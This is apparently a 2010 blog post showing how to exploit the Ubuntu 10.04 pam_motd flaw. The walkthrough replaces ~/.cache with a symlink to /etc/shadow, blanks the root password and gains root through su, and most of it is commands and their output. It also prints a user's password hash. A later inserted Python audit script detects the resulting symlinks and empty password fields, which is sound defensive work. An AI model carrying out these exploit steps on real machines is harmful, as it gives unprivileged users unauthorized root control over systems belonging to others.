Exploiting Ubuntu pam_motd vulnerability

July 12th, 2010

There is a PAM vulnerability in unpatched copies of Ubuntu. According to Ubuntu (Article Here), the issue is in the pam_motd module, and it allows /etc/shadow to be modified by an unprivileged user. The shadow file holds the hashed copies of user passwords; /etc/passwd references it by placing a single ‘x’ in the password field.

I went ahead and installed a fresh copy of Ubuntu 10.04 Server in a VM to test this out. The only modification I made was to install ssh.

The first thing we want to do is log in.


Ubuntu 10.04 LTS ubuntu tty1

ubuntu login: metacortex
Password:

Once I am in, I go ahead and check my current uid.


metacortex@ubuntu:~$ id
uid=1001(metacortex) gid=1001(metacortex) groups=1001(metacortex)

Now we can look and see what the default .cache directory contains


metacortex@ubuntu:~$ ls .cache/
motd.legal-displayed

It doesn’t really matter anyway, because we are going to go ahead and get rid of it like so.


metacortex@ubuntu:~$ rm -rfv .cache/
removed `.cache/motd.legal-displayed'
removed directory: `.cache'

Now to actually take advantage of the vulnerability, we are going to create a soft link to /etc/shadow in place of the .cache directory


metacortex@ubuntu:~$ ln -s /etc/shadow .cache
metacortex@ubuntu:~$ ls -alh
total 20k
drwxr-xr-x 2 metacortex metacortex 4.0k 2010-07-12 14:47 .
drwxr-xr-x 4 root root 4.0k 2010-07-12 14:42 ..
-rw-r--r-- 1 metacortex metacortex 220 2010-04-18 20:15 .bash_logout
-rw-r--r-- 1 metacortex metacortex 3.1k 2010-04-18 20:15 .bashrc
lrwxrwxrwx 1 metacortex metacortex 11 2010-07-12 14:47 .cache -> /etc/shadow
-rw-r--r-- 1 metacortex metacortex 675 2010-04-18 20:15 .profile

With this soft link in place, we have full read and write access to /etc/shadow.


metacortex@ubuntu:~$ vim .cache

In VIM we will see the following


root:*:14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.espM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
".cache" 24L, 839C 1,1 All

Now that we have write access to the shadow file, we can do whatever we want with it, such as completely removing the root password like this.


root::14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.espM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
".cache" 24L, 839C 1,1 All

After we save it, we need to re-invoke pam_motd by logging in again.


metacortex@ubuntu:~$ ssh localhost
Password:

Now we can log in as root whenever we would like.


metacortex@ubuntu:~$ su -
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
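The walkthrough above leaves two artifacts that an administrator can look for on a host that may not have been patched: a user's ~/.cache that is a symlink resolving outside that user's home directory (here, to /etc/shadow), and a shadow record whose password field has been emptied (the edited root:: line). The following audit script is an added example written for this page; it is not part of the original post and not Ubuntu's or pam_motd's own code. The home-directory layout and the shadow-format sample it checks are constructed inline so it runs offline; the function names find_cache_symlinks, parse_shadow and find_passwordless_accounts are this example's own, and the hash in the sample is a placeholder rather than a real one.

```python
"""Defender-side audit for the two traces left by the pam_motd symlink abuse:
a symlinked ~/.cache that escapes the user's home, and a shadow record with an
empty password field. Constructed example; not the original post's code.
"""
import os
import tempfile


def find_cache_symlinks(home_root):
    """Return [(user, resolved_target)] for every <home_root>/<user>/.cache that
    is a symlink resolving outside <home_root>/<user>. A .cache that is a real
    directory, or a symlink staying inside the home, is not reported."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, user)
        cache = os.path.join(home, ".cache")
        if not os.path.islink(cache):
            continue
        target = os.path.realpath(cache)           # follows the link chain
        home_real = os.path.realpath(home)
        if not target.startswith(home_real + os.sep):
            findings.append((user, target))
    return findings


def parse_shadow(shadow_text):
    """Parse shadow(5)-format text into {user: password_field}. shadow(5) has
    nine colon-separated fields; malformed lines are skipped, not guessed at."""
    records = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            continue
        records[fields[0]] = fields[1]
    return records


def find_passwordless_accounts(shadow_text):
    """Accounts whose password field is empty. Unlike '*' or '!' (locked),
    an empty field means login and su succeed with no password at all."""
    return sorted(user for user, pw in parse_shadow(shadow_text).items() if pw == "")


# Constructed sample in the layout the post shows after the edit; the hash is a
# placeholder, not a real SHA-512 crypt value.
SAMPLE_SHADOW = """\
root::14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
metacortex:$6$SALTSALT$PLACEHOLDERHASH:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
"""


def demo_cache_symlink_check():
    """Build a throwaway /home tree: alice has a normal .cache directory, bob
    has a .cache symlink that stays inside his home, and metacortex has the
    .cache -> /etc/shadow link from the post. Returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        home_root = os.path.join(root, "home")
        os.makedirs(os.path.join(home_root, "alice", ".cache"))
        os.makedirs(os.path.join(home_root, "bob", "storage", "cache"))
        os.symlink("storage/cache", os.path.join(home_root, "bob", ".cache"))
        os.makedirs(os.path.join(home_root, "metacortex"))
        # Creating a symlink needs no privilege on its target, which is the
        # whole point of the post; only metacortex should be reported.
        os.symlink("/etc/shadow", os.path.join(home_root, "metacortex", ".cache"))
        return find_cache_symlinks(home_root)


if __name__ == "__main__":
    for user, target in demo_cache_symlink_check():
        print(f"suspicious ~/.cache for {user}: -> {target}")
    for user in find_passwordless_accounts(SAMPLE_SHADOW):
        print(f"account with empty password field: {user}")
```

On a real host you would call find_cache_symlinks("/home") as root and feed the contents of /etc/shadow to find_passwordless_accounts; the empty-field check is also a useful sanity test to run after any incident on a box that was exposed to this bug, since the post's edit leaves no other obvious trace in the file.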

I am not sure of the exact technical details as to what's wrong with pam_motd, but from what I can tell it allows the motd root access. What I can not figure out is why it does not work the same for /etc/passwd.

*EDIT*
I may have forgotten to re-invoke pam_motd after changing the soft link from shadow to passwd. I am able to own /etc/passwd just as easily as /etc/shadow. I also found this nice little shell script that automates it at packetstorm.
